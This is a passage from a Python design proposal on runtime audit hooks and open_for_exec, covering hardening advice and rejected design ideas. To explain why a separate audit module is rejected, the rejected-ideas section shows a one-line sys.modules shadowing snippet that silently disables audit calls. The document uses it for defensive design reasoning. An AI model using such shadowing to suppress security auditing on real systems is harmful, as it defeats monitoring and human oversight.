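except RuntimeError:
    pass  # some runtimes may surface the refusal to the caller

sys.audit("example.event")  # late_hook never sees this event
```

Because hooks can never be removed, this choice is final for the
lifetime of the process.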

On production machines, a non-validating ``open_for_exec`` hook **may**
be set in C code before ``Py_Initialize`` is called. This prevents later
code from overriding the hook. However, logging the
``setopenforexecutehandler`` event is useful since no code should ever
need to call it. Using at least the sample ``open_for_exec`` hook
implementation from ``spython`` is recommended.

Since ``importlib``'s use of ``open_for_exec`` may be easily bypassed
with monkeypatching, an audit hook **should** be used to detect
attribute changes on type objects.

[TODO: more good advice; less bad advice]

Rejected Ideas
==============

Separate module for audit hooks
-------------------------------

The proposal is to add a new module for audit hooks, hypothetically
``audit``. This would separate the API and implementation from the
``sys`` module, and allow naming the C functions ``PyAudit_AddHook`` and
``PyAudit_Audit`` rather than the current variations.

Any such module would need to be a built-in module that is guaranteed to
always be present. The nature of these hooks is that they must be
callable without condition, as any conditional imports or calls provide
more opportunities to intercept and suppress or modify events.

Because it is one of the most fundamental modules, the ``sys`` module is
somewhat protected against module shadowing attacks. Replacing ``sys``
with a module functional enough that the application can still run
is a much more complicated task than replacing a module with only one
function of interest. An attacker who is able to shadow the
``sys`` module is already capable of running arbitrary code from files,
whereas an ``audit`` module can be replaced with a single statement::

    import sys; sys.modules['audit'] = type('audit', (object,),
        {'audit': lambda *a: None, 'addhook': lambda *a: None})

Multiple layers of protection already exist against monkey patching
attacks on either ``sys`` or ``audit``, but assignments or insertions to
``sys.modules`` are not audited.
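
As a sketch of why such a replacement takes effect (the ``audit`` module
is hypothetical and does not exist), a later ``import audit`` simply
returns whatever object is stored in ``sys.modules``, so every caller
receives the stand-in:

.. code-block:: python

    import sys

    # Shadow the hypothetical "audit" module with a stand-in object whose
    # functions accept any arguments and do nothing.
    sys.modules['audit'] = type('audit', (object,),
        {'audit': lambda *a: None, 'addhook': lambda *a: None})

    import audit  # resolved from sys.modules; no file is located or loaded

    # The event is silently discarded instead of reaching any hook.
    result = audit.audit('import', 'os')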

This idea is rejected because it makes it nearly trivial to replace the
``audit`` calls made by every caller.

Flag in sys.flags to indicate "secure" mode
-------------------------------------------

The proposal is to add a value in ``sys.flags`` to indicate when Python
is running in a "secure" mode. This would allow applications to detect
when some features are enabled and modify their behaviour appropriately.

Currently, this PEP makes no guarantees about security; this section is
the first time the word "secure" has been used. Security
**transparency** does not result in any changed behaviour, so there is
no appropriate reason for applications to modify their behaviour.

Both application-level APIs ``sys.audit`` and ``os.open_for_exec`` are
always present and functional, regardless of whether the regular
``python`` entry point or some alternative entry point is used. Callers
cannot determine whether any hooks have been added (except by performing
side-channel analysis), nor do they need to. The calls should be fast
enough that callers do not need to avoid them, and the sysadmin is
responsible for ensuring their added hooks are fast enough to not affect
application performance.

The argument that this is "security by obscurity" is valid, but
irrelevant. Security by obscurity is only an issue when there are no
other protective mechanisms; obscurity as the first step in avoiding
attack is strongly recommended (see `this article
<https://danielmiessler.com/study/security-by-obscurity/>`_ for
discussion).

This idea is rejected because there are no appropriate reasons for an
application to change its behaviour based on whether these APIs are in
use.

Further Reading
===============


**Redefining Malware: When Old Terms Pose New Threats**
    By Aviv Raff for SecurityWeek, 29th January 2014

    This article, and those linked by it, are high-level summaries of the rise of
    APTs and the differences from "traditional" malware.

    `<http://www.securityweek.com/redefining-malware-when-old-terms-pose-new-threats>`_

**Anatomy of a Cyber Attack**
    By FireEye, accessed 23rd August 2017

    A summary of the techniques used by APTs, and links to a number of relevant
    whitepapers.

    `<https://www.fireeye.com/current-threats/anatomy-of-a-cyber-attack.html>`_

**Automated Traffic Log Analysis: A Must Have for Advanced Threat Protection**
    By Aviv Raff for SecurityWeek, 8th May 2014

    High-level summary of the value of detailed logging and automatic analysis.

    `<http://www.securityweek.com/automated-traffic-log-analysis-must-have-advanced-threat-protection>`_

**No Easy Breach: Challenges and Lessons Learned from an Epic Investigation**
    Video presented by Matt Dunwoody and Nick Carr for Mandiant at ShmooCon 2016

    Detailed walkthrough of the processes and tools used in detecting and removing
    an APT.

    `<https://archive.org/details/No_Easy_Breach>`_

**Disrupting Nation State Hackers**
    Video presented by Rob Joyce for the NSA at USENIX Enigma 2016

    Good security practices, capabilities and recommendations from the chief of
    NSA's Tailored Access Operations.

    `<https://www.youtube.com/watch?v=bDJb8WOJYdA>`_

References
==========

.. [1] Assume Breach Mindset, `<http://asian-power.com/node/11144>`_

.. [2] PowerShell Loves the Blue Team, also known as Scripting Security and
   Protection Advances in Windows 10, `<https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/>`_

.. [3] `<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>`_

.. [4] `<https://aka.ms/deviceguard>`_

.. [5] AMSI, `<https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx>`_

.. [6] Persistent Zone Identifiers, `<https://msdn.microsoft.com/en-us/library/ms537021(v=vs.85).aspx>`_

.. [7] Event tracing, `<https://msdn.microsoft.com/en-us/library/aa363668(v=vs.85).aspx>`_

.. [8] `<https://www.gnupg.org/>`_

.. [9] `<https://www.systutorials.com/docs/linux/man/3-sd_journal_send/>`_

.. [10] `<http://www.trustedbsd.org/openbsm.html>`_

.. [11] `<https://linux.die.net/man/3/syslog>`_

.. [12] `<http://security.blogoverflow.com/2013/01/a-brief-introduction-to-auditd/>`_

.. [13] SELinux access decisions, `<http://man7.org/linux/man-pages/man3/avc_entry_ref_init.3.html>`_

Acknowledgments
===============

Thanks to all the people from Microsoft involved in helping make the
Python runtime safer for production use, and especially to James Powell
for doing much of the initial research, analysis and implementation, Lee
Holmes for invaluable insights into the info-sec field and PowerShell's
responses, and Brett Cannon for the restraining and grounding
discussions.

Copyright
=========

Copyright (c) 2017 by Microsoft Corporation. This material may be
distributed only subject to the terms and conditions set forth in the
Open Publication License, v1.0 or later (the latest version is presently
available at http://www.opencontent.org/openpub/).